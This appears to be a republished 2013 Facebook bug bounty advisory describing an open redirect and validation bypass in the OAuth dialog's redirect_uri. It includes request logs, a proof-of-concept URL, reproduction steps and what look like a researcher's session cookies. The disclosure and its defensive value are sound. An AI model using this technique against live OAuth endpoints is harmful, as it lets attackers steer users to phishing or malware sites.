Facebook Bug Bounty 2013 – Open Redirect Vulnerability

Editorial_Staff_Team's picture

Facebook Bug Bounty 2013 – Open Redirect Vulnerability

A open redirect and filter bypass vulnerability was detected in the official original Facebook and Facebook core application. The vulnerability allows to bypass the basic validation of the application module to redirect users unauthorized to an external source.

Normally the redirect exception only allows the attacker to redirect to allowed or internal applications. The attacker exchanges the application url id with a valid request and can inject an url to external target but the attacker needs to make at the end of the domain a bind.php#_=_ to redirect successful to the external source. After requesting the url which does not expire because of the client id which can be exchanged randomly with others the request will redirect the victim to another web page.

The vulnerability does not only bypass the validation of the uri redirect it also allows to bypass obviously the basic website url validation and the at the end the canvas url module. By including a true after the permission in the request the canvas url and basic website url validation pops up, in the secound step the attacker can bypass the restriction and filter to request the external source context with the bound `bind.php` file at the end.

The payload with the url can also be html encoded with obfuscation and the obvious visibility of the malicious link is not anymore granted to facebook customer at the end.

The vulnerability has been detected in the original facebook webpage when processing to request to normal (2013) facebook profile. The vulnerability can be exploited by remote attackers without privilege application user account and with low required user interaction. Successful exploitation of the vulnerability results in a filter validation bypass and external open redirects to malware, redirect to active exploit codes or open redirect websites with evil context.

The vulnerability can be exploited by remote attackers without privilege application user account but with low required user interaction. For demonstration or reproduce …

— 1. Application Request Log (Standard) — The original F.B. would like to access your public profile, friend list, email address and birthday.

URL: https://www.facebook.com/dialog/oauth?client_id=197213247091377&redirect... %26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3D user_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday

— 2. Application Request Log (Manipulated) — Given URL is not allowed by the Application configuration.: One or more of the given URLs is not allowed by the App’s settings. It must match the Website URL or Canvas URL, or the domain must be a subdomain of one of the App’s domains.

URL: https://www.facebook.com/dialog/oauth?client_id=197213247091377&redirect... %26error_code%3D200%26error_description%3DPermissions%2Btrue%26error_reason%3D user_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday

— 3. Session Request Log — 12:32:38.390[0ms][total 0ms] Status: pending[] GET https://www.facebook.com/ajax/typeahead/search/bootstrap.php?filter[0]=a... friendlist&viewer=100001940496405& token=v7&lazy=1&__user=100001940496405&__a=1&__dyn=7AgliRz41eFqw&__req=1 Load Flags[LOAD_BACKGROUND ] Content Size[unknown] Mime Type[unknown]

Request Headers: Host[www.facebook.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] X-SVN-Rev[849772] Referer[https://www.facebook.com/dialog/oauth?client_id=197213247091377 &redirect_uri=http%3A%2F%2Fwww.vulnerability-lab.com%2Fbind.php%3Ferror%3Daccess_denied%26error_cod... %3DPermissions%2Btrue%26error_reason%3Duser_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday] Cookie[datr=7SPAUV-Qdp3p5toUeuJmVKKh; xs=61%3AAW4yu2J9DGjrdg%3A2%3A1371546617; s=Aa67iFZyBa4AeBX5.BRwCP5; lu=RgkYWDlJbKsH78Zpl3lJq1NQ; fr=0SkSCcUdfk9Q4Ib5h.AWU23DrSih0nmu_WSCdundo3WiY.BRwCP5.oA.AWXSujgm; csm=2; c_user=100001940496405; sub=-1744793600; act=1371551493977%2F6; p=106; presence=EM371551558EuserFA21B01940496405A2EstateFDsb2F0Et2F_5b_5dElm2Fnull Euct2F1371546017BEtrFnullEtwF3378383057EatF1371551496190G371 551558336CEchFDp_5f1B01940496405F70CC] –> Status: pending[] GET https://www.facebook.com/ajax/typeahead/search/bootstrap.php?filter[0]=u... Load Flags[LOAD_BACKGROUND ] Content Size[unknown] Mime Type[unknown]

Request Headers: Host[www.facebook.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] X-SVN-Rev[849772] Referer[https://www.facebook.com/dialog/oauth?client_id=197213247091377 &redirect_uri=http%3A%2F%2Fwww.vulnerability-lab.com%2Fbind.php%3Ferror%3Daccess_denied%26error_cod... %3DPermissions%2Btrue%26error_reason%3Duser_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday] Cookie[datr=7SPAUV-Qdp3p5toUeuJmVKKh; xs=61%3AAW4yu2J9DGjrdg%3A2%3A1371546617; s=Aa67iFZyBa4AeBX5.BRwCP5; lu=RgkYWDlJbKsH78Zpl3lJq1NQ; fr=0SkSCcUdfk9Q4Ib5h.AWU23DrSih0nmu_WSCdundo3WiY.BRwCP5.oA.AWXSujgm; csm=2; c_user=100001940496405; sub=-1744793600; act=1371551493977%2F6; p=106; presence=EM371551558EuserFA21B01940496405A2EstateFDsb2F0Et2F_5b_ 5dElm2FnullEuct2F1371546017BEtrFnullEtwF337 8383057EatF1371551496190G371551558336CEchFDp_5f1B01940496405F70CC] –> GET http://www.vulnerability-lab.com/bind.php#_=_ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[802] Mime Type[text/html]

Request Headers: Host[www.vulnerability-lab.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Cookie[PHPSESSID=e85e337428d7bab99e6b1c3524ce4106] Connection[keep-alive]

Response Headers: Content-Type[text/html] Server[Microsoft-IIS/7.x] X-Powered-By[ASP.NET] X-Powered-By-XXX Date[Tue, 18 Jun 2013 10:32:44 GMT] Content-Length[802]

PoC: https://www.facebook.com/dialog/oauth?client_id=197213247091377&redirect... TO EXTERNAL URL]%2Fbind.php%3Ferror%3D access_denied%26error_code%3D200%26error_description%3DPermissions%2Btrue%26error_reason%3D user_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday

Unauthorized open redirect to external URL: https://www.vulnerability-lab.com/bind.php#_=_[Facebook Bug Bounty Program!]

Steps to reproduce … 1. Open the facebook url page and make sure you be logged in to standard facebook with any test account 2. Now you open up the original facebook page and try to use the login oauth 3. The website will redirect you (1.) 4. Go on top of the url bar in the browser and change permission error to permission true + include your own external test url 5. Reload the request and now the web message of the basic website url validation and canvas pops up with a message (2.) 6. Now you cancel the request of the mask which should normally prevent any kind of wrong executions to unauthorized or external source 7. The website redirects the user to the injected website and includes from the vulnerable facebook script the bind.php#_=_ at the end 8. Successful reproduce of the vulnerability and bypass of the basic filter `website url` and `canvas`

Reference(s): https://www.facebook.com/dialog/oauth?client_id=197213247091377&redirect... Permissions%2Btrue%26error_reason%3Duser_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday

Facebook WhiteHat Bug Bounty Program 2013 - 1500$ Ismail Kaleem (MV)

Security Video:

Rate this article: 
Average: 2.3 (7 votes)

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.